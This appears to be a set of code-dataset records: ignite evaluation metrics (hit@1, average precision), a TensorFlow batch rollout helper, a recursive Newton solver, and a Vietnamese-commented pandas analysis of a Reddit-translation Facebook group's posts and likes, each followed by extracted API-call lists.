"matplotlib.pyplot.show",
"numpy.sum",
"rl_tools.twist",
"rl_tools.simulation",
"numpy.asarray",
"numpy.zeros",
"rl_tools.countcalc",
"numpy.append",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.arange",
"numpy.array",
"rl_tools.newcard"
] |
[((432, 452), 'numpy.zeros', 'np.zeros', (['(34, 2, 5)'], {}), '((34, 2, 5))\n', (440, 452), True, 'import numpy as np\n'), ((640, 660), 'numpy.zeros', 'np.zeros', (['(34, 2, 5)'], {}), '((34, 2, 5))\n', (648, 660), True, 'import numpy as np\n'), ((906, 918), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (916, 918), True, 'import matplotlib.pyplot as plt\n'), ((1310, 1320), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1318, 1320), True, 'import matplotlib.pyplot as plt\n'), ((1519, 1533), 'numpy.asarray', 'np.asarray', (['[]'], {}), '([])\n', (1529, 1533), True, 'import numpy as np\n'), ((1550, 1577), 'rl_tools.initializedrawpile', 'initializedrawpile', (['nodecks'], {}), '(nodecks)\n', (1568, 1577), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((2875, 2893), 'numpy.mean', 'np.mean', (['testscore'], {}), '(testscore)\n', (2882, 2893), True, 'import numpy as np\n'), ((746, 773), 'rl_tools.initializedrawpile', 'initializedrawpile', (['nodecks'], {}), '(nodecks)\n', (764, 773), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((976, 1007), 'numpy.sum', 'np.sum', (['Qtable[:, 1, :]'], {'axis': '(1)'}), '(Qtable[:, 1, :], axis=1)\n', (982, 1007), True, 'import numpy as np\n'), ((1034, 1065), 'numpy.sum', 'np.sum', (['Qtable[:, 0, :]'], {'axis': '(1)'}), '(Qtable[:, 0, :], axis=1)\n', (1040, 1065), True, 'import numpy as np\n'), ((1284, 1303), 'numpy.arange', 'np.arange', (['(0)', '(22)', '(1)'], {}), '(0, 22, 1)\n', (1293, 1303), True, 'import numpy as np\n'), ((1665, 1680), 'rl_tools.twist', 'twist', (['drawpile'], {}), '(drawpile)\n', (1670, 1680), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((1702, 1721), 'rl_tools.countcalc', 'countcalc', (['drawpile'], {}), '(drawpile)\n', (1711, 1721), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((1745, 1764), 'numpy.array', 'np.array', (['[0, card]'], {}), '([0, card])\n', (1753, 1764), True, 'import numpy as np\n'), ((2835, 2862), 'numpy.append', 'np.append', (['testscore', 'score'], {}), '(testscore, score)\n', (2844, 2862), True, 'import numpy as np\n'), ((852, 894), 'rl_tools.simulation', 'simulation', (['Qtable', 'Instances', 'drawpile', 'e'], {}), '(Qtable, Instances, drawpile, e)\n', (862, 894), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((2408, 2436), 'rl_tools.newcard', 'newcard', (['newaction', 'drawpile'], {}), '(newaction, drawpile)\n', (2415, 2436), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((2468, 2496), 'numpy.append', 'np.append', (['cardsinhand', 'card'], {}), '(cardsinhand, card)\n', (2477, 2496), True, 'import numpy as np\n'), ((2597, 2616), 'rl_tools.countcalc', 'countcalc', (['drawpile'], {}), '(drawpile)\n', (2606, 2616), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((1227, 1258), 'numpy.sum', 'np.sum', (['Qtable[:, 0, :]'], {'axis': '(1)'}), '(Qtable[:, 0, :], 
axis=1)\n', (1233, 1258), True, 'import numpy as np\n')]
|
# Copyright (c) 2021 Qualcomm Technologies, Inc.
# All Rights Reserved.
import numpy as np
from ignite.metrics import Metric
def softmax(logit):
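    # Numerically stable softmax: subtracting the max before exponentiating
    # avoids overflow without changing the result.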
e_x = np.exp(logit - np.max(logit))
return e_x / e_x.sum()
def sigmoid(logit):
return 1 / (1 + np.exp(-logit))
class Hitat1(Metric):
"""
Performs a local (numpy) calculation of the hit at one.
"""
def __init__(
self, aggregation="max", output_transform=lambda x: x, activation_fn=None
):
self.predictions_dict = {}
self.actuals_dict = {}
self.aggregation = np.max if aggregation == "max" else np.mean
self.apply_activation = (
softmax
if activation_fn == "softmax"
else sigmoid
if activation_fn == "sigmoid"
else None
)
super(Hitat1, self).__init__(output_transform=output_transform, device=None)
def reset(self):
self.predictions_dict = {}
self.actuals_dict = {}
def update(self, output, masks=None):
"""
Parameters
----------
# predictions is n * num_class numpy array of predictions where n is number of samples
# actuals is n * num_class numpy array of multihot labels where n is number of samples
"""
predictions, actuals, ids = output
for i, key in enumerate(ids):
if key in self.predictions_dict:
self.predictions_dict[key].append(predictions[i])
self.actuals_dict[key].append(actuals[i])
else:
self.predictions_dict[key] = [predictions[i]]
self.actuals_dict[key] = [actuals[i]]
def compute(self):
preds, acts, keys = [], [], []
for key in self.predictions_dict.keys():
pred_video = self.aggregation(
np.stack(self.predictions_dict[key]), axis=0
).squeeze()
if self.apply_activation:
pred_video = self.apply_activation(pred_video)
preds.append(pred_video)
acts.append(np.stack(self.actuals_dict[key]).max(axis=0).squeeze())
keys.append(key)
preds = np.stack(preds)
acts = np.stack(acts)
non_negative = np.any(acts, axis=1)
acts = acts[non_negative]
preds = preds[non_negative]
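        # hit@1: a video counts as a hit if its single highest-scoring class
        # is among its true labels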
top_prediction = np.argmax(preds, 1)
hits = acts[np.arange(acts.shape[0]), top_prediction]
return np.average(hits)
class AveragePrecision(Metric):
# compute metrics based on video ids
def __init__(
self,
num_class=1000,
top_n=None,
aggregation="max",
filter_empty_classes=False,
output_transform=lambda x: x,
activation_fn=None,
):
super(AveragePrecision, self).__init__(
output_transform=output_transform, device=None
)
self.num_class = num_class
self.top_n = top_n
self.filter_empty_classes = filter_empty_classes
self.predictions = [[] for _ in range(num_class)]
self.actuals = [[] for _ in range(num_class)]
self.predictions_dict = {}
self.actuals_dict = {}
self.aggregation = np.max if aggregation == "max" else np.mean
self.apply_activation = (
softmax
if activation_fn == "softmax"
else sigmoid
if activation_fn == "sigmoid"
else None
)
def reset(self):
self.predictions_dict = {}
self.actuals_dict = {}
def update(self, output):
"""
Parameters
----------
# predictions is n * num_class numpy array of predictions where n is number of samples
# actuals is n * num_class numpy array of multihot labels where n is number of samples
"""
predictions, actuals, ids = output
for i, key in enumerate(ids):
if key in self.predictions_dict:
self.predictions_dict[key].append(predictions[i])
self.actuals_dict[key].append(actuals[i])
else:
self.predictions_dict[key] = [predictions[i]]
self.actuals_dict[key] = [actuals[i]]
def compute(self):
predictions, actuals, keys = self._arrange_predictions_by_class()
res = []
for i in range(self.num_class):
target = np.concatenate(actuals[i])
output = np.concatenate(predictions[i])
ap_class, num_pos = self.ap(output, target, top_n=self.top_n)
if not self.filter_empty_classes or num_pos > 0:
res.append(ap_class)
return res
def _arrange_predictions_by_class(self):
preds, acts, keys = [], [], []
for key in self.predictions_dict.keys():
pred_video = self.aggregation(
np.stack(self.predictions_dict[key]), axis=0
).squeeze()
if self.apply_activation:
pred_video = self.apply_activation(pred_video)
preds.append(pred_video)
acts.append(np.stack(self.actuals_dict[key]).max(axis=0).squeeze())
keys.append(key)
preds = np.stack(preds)
acts = np.stack(acts)
predictions = [[] for _ in range(self.num_class)]
actuals = [[] for _ in range(self.num_class)]
for i in range(self.num_class):
predictions[i].append(preds[:, i])
actuals[i].append(acts[:, i])
return predictions, actuals, keys
@staticmethod
def ap(predictions, actuals, top_n=None):
num_positive_total = actuals.sum()
if num_positive_total == 0:
return float("NaN"), 0
sorted_idx = np.argsort(predictions)[::-1]
if top_n is not None:
sorted_idx = sorted_idx[:top_n]
actuals = actuals[sorted_idx]
num_pos = actuals.sum()
precisions = np.cumsum(actuals) / np.arange(1, len(actuals) + 1)
ap = (precisions * actuals).sum() / (float(num_pos) + 1e-15)
return ap, num_positive_total
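

# Illustrative sketch (not part of the original module): the static `ap` helper
# can be sanity-checked on a toy ranking without constructing the ignite Metric.
if __name__ == "__main__":
    toy_scores = np.array([0.9, 0.8, 0.3, 0.1])
    toy_labels = np.array([1, 0, 1, 0])
    # precisions at the two positives are 1/1 and 2/3, so AP should be ~0.833
    print(AveragePrecision.ap(toy_scores, toy_labels))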
|
[
"numpy.stack",
"numpy.average",
"numpy.argmax",
"numpy.any",
"numpy.argsort",
"numpy.max",
"numpy.cumsum",
"numpy.arange",
"numpy.exp",
"numpy.concatenate"
] |
[((2169, 2184), 'numpy.stack', 'np.stack', (['preds'], {}), '(preds)\n', (2177, 2184), True, 'import numpy as np\n'), ((2200, 2214), 'numpy.stack', 'np.stack', (['acts'], {}), '(acts)\n', (2208, 2214), True, 'import numpy as np\n'), ((2239, 2259), 'numpy.any', 'np.any', (['acts'], {'axis': '(1)'}), '(acts, axis=1)\n', (2245, 2259), True, 'import numpy as np\n'), ((2356, 2375), 'numpy.argmax', 'np.argmax', (['preds', '(1)'], {}), '(preds, 1)\n', (2365, 2375), True, 'import numpy as np\n'), ((2453, 2469), 'numpy.average', 'np.average', (['hits'], {}), '(hits)\n', (2463, 2469), True, 'import numpy as np\n'), ((5166, 5181), 'numpy.stack', 'np.stack', (['preds'], {}), '(preds)\n', (5174, 5181), True, 'import numpy as np\n'), ((5197, 5211), 'numpy.stack', 'np.stack', (['acts'], {}), '(acts)\n', (5205, 5211), True, 'import numpy as np\n'), ((173, 186), 'numpy.max', 'np.max', (['logit'], {}), '(logit)\n', (179, 186), True, 'import numpy as np\n'), ((257, 271), 'numpy.exp', 'np.exp', (['(-logit)'], {}), '(-logit)\n', (263, 271), True, 'import numpy as np\n'), ((4370, 4396), 'numpy.concatenate', 'np.concatenate', (['actuals[i]'], {}), '(actuals[i])\n', (4384, 4396), True, 'import numpy as np\n'), ((4418, 4448), 'numpy.concatenate', 'np.concatenate', (['predictions[i]'], {}), '(predictions[i])\n', (4432, 4448), True, 'import numpy as np\n'), ((5697, 5720), 'numpy.argsort', 'np.argsort', (['predictions'], {}), '(predictions)\n', (5707, 5720), True, 'import numpy as np\n'), ((5893, 5911), 'numpy.cumsum', 'np.cumsum', (['actuals'], {}), '(actuals)\n', (5902, 5911), True, 'import numpy as np\n'), ((2396, 2420), 'numpy.arange', 'np.arange', (['acts.shape[0]'], {}), '(acts.shape[0])\n', (2405, 2420), True, 'import numpy as np\n'), ((1837, 1873), 'numpy.stack', 'np.stack', (['self.predictions_dict[key]'], {}), '(self.predictions_dict[key])\n', (1845, 1873), True, 'import numpy as np\n'), ((4834, 4870), 'numpy.stack', 'np.stack', (['self.predictions_dict[key]'], {}), '(self.predictions_dict[key])\n', (4842, 4870), True, 'import numpy as np\n'), ((2068, 2100), 'numpy.stack', 'np.stack', (['self.actuals_dict[key]'], {}), '(self.actuals_dict[key])\n', (2076, 2100), True, 'import numpy as np\n'), ((5065, 5097), 'numpy.stack', 'np.stack', (['self.actuals_dict[key]'], {}), '(self.actuals_dict[key])\n', (5073, 5097), True, 'import numpy as np\n')]
|
import numpy as np
import tensorflow as tf
class BatchRollout:
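    """Collects up to `max_episode_steps` steps from a batch of vectorized
    environments and returns (observations, actions, rewards, weights) arrays
    as tensors, where `weights` masks out steps recorded after an episode has
    already terminated."""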
def __init__(self, env, max_episode_steps):
self.env = env
self.max_episode_steps = max_episode_steps
def __call__(self, policy, episodes, render=False):
assert len(self.env) == episodes
observation_space = self.env.observation_space
action_space = self.env.action_space
observations = np.zeros(
shape=(episodes, self.max_episode_steps) + observation_space.shape,
dtype=observation_space.dtype,
)
actions = np.zeros(
shape=(episodes, self.max_episode_steps) + action_space.shape,
dtype=action_space.dtype,
)
rewards = np.zeros(shape=(episodes, self.max_episode_steps), dtype=np.float32)
weights = np.zeros(shape=(episodes, self.max_episode_steps), dtype=np.float32)
batch_size = len(self.env)
episode_done = np.zeros(shape=batch_size, dtype=np.bool)
observation = self.env.reset()
for step in range(self.max_episode_steps):
if render:
self.env.envs[0].render()
observation_tensor = tf.convert_to_tensor(observation, dtype=tf.float32)
action_tensor = policy(observation_tensor[:, None, ...], training=False)
action = action_tensor[:, 0].numpy()
observation_next, reward, done, info = self.env.step(action)
observations[:, step] = observation
actions[:, step] = action
rewards[:, step] = reward
weights[:, step] = np.where(episode_done, 0.0, 1.0)
# update episode done status
episode_done = episode_done | done
# end the rollout if all episodes are done
if np.all(episode_done):
break
observation = observation_next
# ensure rewards are masked
rewards *= weights
observations = tf.convert_to_tensor(observations)
actions = tf.convert_to_tensor(actions)
rewards = tf.convert_to_tensor(rewards)
weights = tf.convert_to_tensor(weights)
return observations, actions, rewards, weights
|
[
"tensorflow.convert_to_tensor",
"numpy.where",
"numpy.zeros",
"numpy.all"
] |
[((410, 521), 'numpy.zeros', 'np.zeros', ([], {'shape': '((episodes, self.max_episode_steps) + observation_space.shape)', 'dtype': 'observation_space.dtype'}), '(shape=(episodes, self.max_episode_steps) + observation_space.shape,\n dtype=observation_space.dtype)\n', (418, 521), True, 'import numpy as np\n'), ((571, 672), 'numpy.zeros', 'np.zeros', ([], {'shape': '((episodes, self.max_episode_steps) + action_space.shape)', 'dtype': 'action_space.dtype'}), '(shape=(episodes, self.max_episode_steps) + action_space.shape,\n dtype=action_space.dtype)\n', (579, 672), True, 'import numpy as np\n'), ((722, 790), 'numpy.zeros', 'np.zeros', ([], {'shape': '(episodes, self.max_episode_steps)', 'dtype': 'np.float32'}), '(shape=(episodes, self.max_episode_steps), dtype=np.float32)\n', (730, 790), True, 'import numpy as np\n'), ((809, 877), 'numpy.zeros', 'np.zeros', ([], {'shape': '(episodes, self.max_episode_steps)', 'dtype': 'np.float32'}), '(shape=(episodes, self.max_episode_steps), dtype=np.float32)\n', (817, 877), True, 'import numpy as np\n'), ((937, 978), 'numpy.zeros', 'np.zeros', ([], {'shape': 'batch_size', 'dtype': 'np.bool'}), '(shape=batch_size, dtype=np.bool)\n', (945, 978), True, 'import numpy as np\n'), ((1955, 1989), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['observations'], {}), '(observations)\n', (1975, 1989), True, 'import tensorflow as tf\n'), ((2008, 2037), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['actions'], {}), '(actions)\n', (2028, 2037), True, 'import tensorflow as tf\n'), ((2056, 2085), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['rewards'], {}), '(rewards)\n', (2076, 2085), True, 'import tensorflow as tf\n'), ((2104, 2133), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['weights'], {}), '(weights)\n', (2124, 2133), True, 'import tensorflow as tf\n'), ((1170, 1221), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['observation'], {'dtype': 'tf.float32'}), '(observation, dtype=tf.float32)\n', (1190, 1221), True, 'import tensorflow as tf\n'), ((1586, 1618), 'numpy.where', 'np.where', (['episode_done', '(0.0)', '(1.0)'], {}), '(episode_done, 0.0, 1.0)\n', (1594, 1618), True, 'import numpy as np\n'), ((1779, 1799), 'numpy.all', 'np.all', (['episode_done'], {}), '(episode_done)\n', (1785, 1799), True, 'import numpy as np\n')]
|
from typing import Callable
import numpy as np
def newtonSolver(f: Callable, f_prime: Callable, guess: float,
tol: float=10e-6, prev: float=0) -> float:
"""Newton method solver for 1 dimension, implemented recursively.
Arguments:
f {Callable} -- Objective function (must have zero root).
f_prime {Callable} -- First derivative of objective with respect to
the decision variable.
guess {float} -- Guess for the decision variable.
Keyword Arguments:
tol {float} -- Tolerance level (default: {10e-6}).
prev {float} -- Guess from previous iteration (for convergence check).
Returns:
float -- Solution to the function s.t. f(x) = 0.
"""
# Assigning current guess to x_old
x_old = guess
# Checking if decision variable changed by less than tolerance level
if np.abs(x_old - prev) < tol:
return x_old
else:
# Compute new estimate for x
x_new = x_old - (f(x_old) / f_prime(x_old))
return newtonSolver(f=f, f_prime=f_prime, guess=x_new,
tol=tol, prev=x_old)
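

# Example usage (illustrative, not part of the original module): Newton's method
# on f(x) = x**2 - 2 should converge to sqrt(2) ~ 1.4142135623730951.
if __name__ == "__main__":
    root = newtonSolver(f=lambda x: x ** 2 - 2,
                        f_prime=lambda x: 2 * x,
                        guess=1.0)
    print(root)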
|
[
"numpy.abs"
] |
[((903, 923), 'numpy.abs', 'np.abs', (['(x_old - prev)'], {}), '(x_old - prev)\n', (909, 923), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
#%%
######################################################
# libraries
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.axes_grid1 import AxesGrid
import math
from scipy import stats
# matplotlib params
mpl.rcParams["axes.titlesize"] = 24
mpl.rcParams["axes.grid"] = True
mpl.rcParams["axes.labelsize"] = 16
mpl.rcParams["xtick.labelsize"] = 14
mpl.rcParams["ytick.labelsize"] = 14
#%%
######################################################
# import data
infile = "20170101T000000-20190101T000000.csv"
df = pd.read_csv(infile, encoding="utf-8", index_col=None, header=0, lineterminator="\n")
totalUnfiltered = df.shape[0]
print("Số bài viết tổng cộng: {:d}".format(totalUnfiltered))
######################################################
# define columns types and filter
df["r"] = df["r"].astype("category")
df["user_raw_id"] = df["user_raw_id"].astype(np.int64)
df["post_raw_id"] = df["post_raw_id"].astype(np.int64)
# avoid case sensitive
df["r"] = df["r"].str.lower()
# time conversion
df.drop(df[df["r_created_utc"] == 0].index, inplace=True) # filter
df["created_time"]=pd.to_datetime(df["created_time"], format="%Y-%m-%dT%H:%M:%S.000Z", utc=True).dt.tz_convert("Asia/Ho_Chi_Minh")
df["r_created_utc"]=pd.to_datetime(df["r_created_utc"], unit="s", utc=True).dt.tz_convert("Asia/Ho_Chi_Minh")
df.drop(df[df["created_time"].dt.year == 2019].index, inplace=True) # filter
totalFiltered = df.shape[0]
print("Số bài viết sau khi lọc: {:d}. Tương đương {:.2f}% tổng số bài.".format(totalFiltered, totalFiltered / totalUnfiltered * 100))
######################################################
# determine week day of post
vietnameseDaysOfWeek = ['Hai', 'Ba', 'Tư', 'Năm', 'Sáu', 'Bảy', 'CN']
df["weekday"] = df["created_time"].dt.weekday
df["weekday"] = df["weekday"].astype("category")
r = pd.crosstab(index=df["r"], columns="count")
r.sort_values(by="count", ascending=False, inplace=True)
######################################################
# interest measure
interests = df.groupby("r")["likes_count", "comments_count"].sum()
interests["sum"] = interests["likes_count"] + interests["comments_count"]
interests.sort_values(by="sum", ascending=False, inplace=True)
######################################################
# prepare hour stats
numWeeks = math.ceil((df.iloc[-1]["created_time"] - df.iloc[0]["created_time"]).days/7)
def meanPostsPerWeek(series):
return np.size(series) / numWeeks
dfWeekdayHourPerSub = df.pivot_table(index=["r", df["created_time"].dt.hour], columns="weekday", values=["likes_count", "post_id"], aggfunc={"likes_count": np.mean, "post_id": meanPostsPerWeek}, fill_value=0)
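# dfWeekdayHourPerSub: for each subreddit, hour of day and weekday, the mean
# number of likes per post and the average number of posts per week over the whole period.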
######################################################
# translators stats
translators = df[["user_raw_id", "user_name"]].copy()
translators.drop_duplicates(subset="user_raw_id", keep='first', inplace=True)
translators.set_index("user_raw_id", inplace=True)
translatorsStats = df.pivot_table(index="user_raw_id", values=["likes_count", "post_id"], aggfunc={"likes_count": [np.sum, np.mean], "post_id": [np.size, meanPostsPerWeek]}, fill_value=0)
#%%
######################################################
# retrospect memory usage
df.info(memory_usage='deep')
for dtype in list(set(df.dtypes)):
selected_dtype = df.select_dtypes(include=[dtype])
sumUsageB = selected_dtype.memory_usage(deep=True).sum()
sumUsageMB = sumUsageB / 1024 ** 2
print("Sum memory usage for {} columns: {:03.2f} MB".format(dtype,sumUsageMB))
print("Usage of each column in MB")
for colName, usageB in df.memory_usage(index=True, deep=True).items():
print("{:<20} {:10.2f} MB".format(colName, usageB / 1024 ** 2))
del dtype, selected_dtype, sumUsageB, sumUsageMB, colName, usageB
#%%
######################################################
# posts by month
df["created_time_utc"] = df["created_time"].dt.tz_convert('UTC')
grouperAllByMonth = df.groupby(by=pd.Grouper(freq="M", key="created_time_utc"))
allPostsByMonth = grouperAllByMonth["post_id"].size().fillna(0)
allLikesByMonth = grouperAllByMonth["likes_count"].sum().fillna(0)
fig = plt.figure()
plt.title("Thống kê tổng số post và like")
monthLabels = allPostsByMonth.index.strftime("%m-%Y").tolist()
ax1 = fig.add_subplot(111)
ax1.plot(monthLabels, allPostsByMonth, "r-", label="Post")
ax1.set_xlabel("Tháng")
ax1.set_ylabel("Số bài viết")
ax2 = ax1.twinx()
ax2.plot(monthLabels, allLikesByMonth, "b-", label="Like")
ax2.set_ylabel("Số like")
ax2.grid(False)
fig.autofmt_xdate()
handles, labels = [],[]
for ax in fig.axes:
for h, l in zip(*ax.get_legend_handles_labels()):
handles.append(h)
labels.append(l)
plt.legend(handles, labels, loc="upper left")
plt.show()
del grouperAllByMonth, allPostsByMonth, allLikesByMonth, handles, labels, h, l, fig, ax1, ax2
df.drop("created_time_utc", axis=1, inplace=True)
#%%
######################################################
# hot subreddits
subs = r.index.nunique()
print("Số subreddit được dịch: {:d}".format(subs))
print("Số bài dịch mỗi sub trung bình: {:f}".format(float(r.mean())))
subsGreater1 = (r > 1).sum()[0]
print("Số subreddit có trên 1 bài viết: {:d}. Tương đương {:.2f}% tổng số sub.".format(subsGreater1, subsGreater1 / subs * 100))
subsGreater10 = (r > 10).sum()[0]
print("Số subreddit có trên 10 bài viết: {:d}. Tương đương {:.2f}% tổng số sub.".format(subsGreater10, subsGreater10 / subs * 100))
subsGreater100 = (r > 100).sum()[0]
print("Số subreddit có trên 100 bài viết: {:d}. Tương đương {:.2f}% tổng số sub.".format(subsGreater100, subsGreater100 / subs * 100))
del subs, subsGreater1, subsGreater10, subsGreater100
#%%
######################################################
# top translated subreddits
N = 30
rTop = r.head(N)
y = np.arange(N)
fig, ax = plt.subplots()
plt.barh(y, rTop["count"])
plt.title("Những Subreddit nhiều bài dịch nhất")
plt.xlabel("Số bài được dịch")
plt.yticks(y, rTop.index.tolist())
for i in ax.patches:
ax.text(i.get_width() + .1, i.get_y() + 0.5, str(int(i.get_width())), color="black", fontsize=14)
ax.invert_yaxis()
ax.grid(False)
plt.show()
del N, rTop, y, i, fig, ax
#%%
######################################################
# top interested subreddits
Ni = 30
yi = np.arange(Ni)
ax = interests.iloc[0:Ni][["likes_count","comments_count"]].plot.barh(stacked=True)
plt.title("Những Subreddit được chú ý nhất")
plt.xlabel("Tổng số cảm xúc và bình luận")
plt.yticks(yi, interests.iloc[0:Ni].index.tolist())  # match the ordering plotted above
plt.ylabel("")
for i, subreddit in enumerate(interests[0:Ni].index.tolist()):
s = interests.loc[subreddit]["sum"]
ax.annotate(str(s), (s, i + .1), color="black", fontsize=14)
ax.invert_yaxis()
ax.grid(False)
del Ni, yi, ax, i, subreddit, s
#%%
######################################################
# askreddit's comments
ratioCommentsCount = interests["comments_count"][0] / interests["comments_count"]
ratioCommentsCount = ratioCommentsCount.drop("askreddit")
ratioCommentsCount = ratioCommentsCount.replace(np.inf, np.nan).dropna()
print("askreddit có số comment nhiều hơn các sub khác {:.2f} lần trở lên.".format(float(ratioCommentsCount.min())))
del ratioCommentsCount
#%%
######################################################
# mean interests
meanInterests = df.groupby("r")["likes_count", "comments_count"].mean()
N = 30
for i in range(N):
subreddit = interests.index[i]
print("Trung bình một bài {:s} sẽ có {:.0f} like (cảm xúc) và {:.0f} bình luận.".format(subreddit, meanInterests.loc[subreddit]["likes_count"], meanInterests.loc[subreddit]["comments_count"]))
# print("{} & {:.0f} & {:.0f} \\\\\n\\hline".format(subreddit, meanInterests.loc[subreddit]["likes_count"], meanInterests.loc[subreddit]["comments_count"]))
print("Còn trung bình toàn thể là {:.0f} like (cảm xúc) và {:.0f} bình luận.".format(df["likes_count"].mean(), df["comments_count"].mean()))
del meanInterests, N, i, subreddit
#%%
######################################################
# posts per month per subreddit
grouperByRMonth = df.groupby(["r", pd.Grouper(freq="M", key="created_time")])
countRByMonth = grouperByRMonth["post_id"].count().unstack("r").fillna(0)
Nr = 15
fig, ax = plt.subplots()
plt.set_cmap("nipy_spectral")
monthLabels = countRByMonth.index.strftime("%m-%Y").tolist()
for subreddit in r.index[0:Nr-1].tolist():
ax.plot(monthLabels, countRByMonth[subreddit].tolist(), label=subreddit)
plt.title("Số bài dịch mỗi sub theo thời gian")
plt.ylabel("")
plt.xlabel("")
fig.autofmt_xdate()
ax.legend()
plt.show()
del grouperByRMonth, countRByMonth, Nr, fig, ax, monthLabels, subreddit
#%%
######################################################
# mean likes per hour overall
dfMeanLikesWeekdayHour = df.pivot_table(index=df["created_time"].dt.hour, columns="weekday", values="likes_count", aggfunc="mean")
fig, ax = plt.subplots()
im = ax.imshow(dfMeanLikesWeekdayHour, cmap="Reds", aspect="auto")
ax.set_xticks(np.arange(len(vietnameseDaysOfWeek)))
ax.set_xticklabels(vietnameseDaysOfWeek)
ax.grid(False)
plt.title("Like trung bình theo giờ đăng")
plt.ylabel("Giờ")
plt.xlabel("Thứ")
plt.colorbar(im, ax=ax)
plt.show()
del dfMeanLikesWeekdayHour, fig, ax, im
#%%
######################################################
# mean posts per hour overall
dfMeanPostsWeekdayHour = df.pivot_table(index=df["created_time"].dt.hour, columns="weekday", values="post_id", aggfunc=np.size)/numWeeks
fig, ax = plt.subplots()
im = ax.imshow(dfMeanPostsWeekdayHour, cmap="Reds", aspect="auto")
ax.set_xticks(np.arange(len(vietnameseDaysOfWeek)))
ax.set_xticklabels(vietnameseDaysOfWeek)
ax.grid(False)
plt.title("Số bài trung bình theo giờ đăng")
plt.ylabel("Giờ")
plt.xlabel("Thứ")
plt.colorbar(im, ax=ax)
plt.show()
del dfMeanPostsWeekdayHour, fig, ax, im
#%%
######################################################
# mean likes per hour per sub
Nrow = 2
Ncol = 4
Noffset = 0
listTopSubs = r.index[Noffset:(Noffset+Nrow*Ncol)].tolist()
fig = plt.figure()
grid = AxesGrid(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True, label_mode="L", cbar_location="right", cbar_mode="single", cbar_pad=0.1, aspect=False)
for i in range(Nrow*Ncol):
subreddit = listTopSubs[i]
imTemp = grid[i].imshow(dfWeekdayHourPerSub.query('r == "{:s}"'.format(subreddit))["likes_count"], cmap="Reds", aspect="auto")
grid[i].set_title(subreddit, fontsize=20)
grid[i].set_aspect("auto")
grid[i].set_xlabel("Thứ")
grid[i].set_ylabel("Giờ")
grid[i].tick_params(axis="both", labelsize=12)
grid[i].grid(False)
grid.cbar_axes[0].colorbar(imTemp)
grid.axes_llc.set_xticks(np.arange(len(vietnameseDaysOfWeek)))
grid.axes_llc.set_xticklabels(vietnameseDaysOfWeek)
fig.suptitle("Like trung bình mỗi giờ của {:d} sub nổi nhất".format(Nrow*Ncol), fontsize=24)
plt.show()
del Nrow, Ncol, Noffset, listTopSubs, fig, grid, i, subreddit, imTemp
#%%
######################################################
# mean posts per hour per sub
Nrow = 2
Ncol = 4
Noffset = 0
listTopSubs = r.index[Noffset:(Noffset+Nrow*Ncol)].tolist()
fig = plt.figure()
grid = AxesGrid(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True, label_mode="L", cbar_location="right", cbar_mode="single", cbar_pad=0.1, aspect=False)
for i in range(Nrow*Ncol):
subreddit = listTopSubs[i]
imTemp = grid[i].imshow(dfWeekdayHourPerSub.query('r == "{:s}"'.format(subreddit))["post_id"], cmap="Reds", aspect="auto")
grid[i].set_title(subreddit, fontsize=20)
grid[i].set_aspect("auto")
grid[i].set_xlabel("Thứ")
grid[i].set_ylabel("Giờ")
grid[i].tick_params(axis="both", labelsize=12)
grid[i].grid(False)
grid.cbar_axes[0].colorbar(imTemp)
grid.axes_llc.set_xticks(np.arange(len(vietnameseDaysOfWeek)))
grid.axes_llc.set_xticklabels(vietnameseDaysOfWeek)
fig.suptitle("Số post trung bình mỗi giờ của {:d} sub nổi nhất".format(Nrow*Ncol), fontsize=24)
plt.show()
del Nrow, Ncol, Noffset, listTopSubs, fig, grid, i, subreddit, imTemp
#%%
######################################################
# statistics of likes of posts
print("Tổng số like: {:d}.".format(df["likes_count"].sum()))
print("Số like trung bình mỗi post: {:.2f}".format(df["likes_count"].mean()))
print("Số like cao nhất: {:d}".format(df["likes_count"].max()))
print("Bài nhiều like nhất: https://www.facebook.com/groups/redditvietnam/permalink/{}/".format(df.loc[df["likes_count"].idxmax()]["post_raw_id"]))
#likescountQuantiles = [.1, .25, .5, .75, .9, .99]
#for i in likescountQuantiles:
# print("{:.0%} bài có trên {:.0f} like.".format(1 - i, df["likes_count"].quantile(i)))
likescountMarkpoints = [100, 300, 500, 1000, 2000, 4000, 6000, 8000]
for i in likescountMarkpoints:
p = (df["likes_count"] >= i).sum()
print("Có {:d} bài ({:.2%}) đạt {:d} like trở lên.".format(p, p / totalFiltered, i))
fig, ax = plt.subplots()
likescountBins = range(0, 4000, 100)
df.hist(column="likes_count", grid=True, xlabelsize=14, ylabelsize=14, bins=likescountBins, ax=ax)
plt.title("Phân bố số like")
plt.xlabel("Số like")
plt.ylabel("Số bài viết")
plt.show()
del likescountMarkpoints, i, p, fig, ax, likescountBins
#%%
######################################################
# estimate distribution
sc = 500
reducedLikescount = df["likes_count"].copy() / sc
l = np.arange(0, 4000 / sc, 100 / (sc * 2))
param = stats.lognorm.fit(reducedLikescount)
